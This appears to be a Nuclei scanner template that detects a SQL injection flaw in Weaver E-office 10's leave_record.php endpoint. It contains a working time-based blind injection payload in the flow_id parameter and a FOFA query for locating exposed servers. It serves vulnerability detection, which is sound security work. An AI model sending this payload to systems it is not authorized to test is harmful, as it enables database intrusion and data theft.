id: eoffice-v10-leave-record-sqli

info:
  name: 泛微E-office 10 leave_record.php接口SQL注入漏洞
  author: Co5mos
  severity: critical
  description: |
    泛微eoffice10协同办公平台是一款专业的office办公工具软件。软件支持在线多人编辑文件，并且会在第一时间收发协作需求。十分方便快捷，界面简约，布局直观清晰，操作简单，极易上手，是一款不可多得的利器。泛微E-office 10 leave_record存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息甚至getshell。
  metadata:
    fofa-query: 'body="eoffice10" && body="eoffice_loading_tip"'
  tags: eoffice10, sqli, weaver

http:
  - raw:
    - |
      @timeout: 10
      GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1
      Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
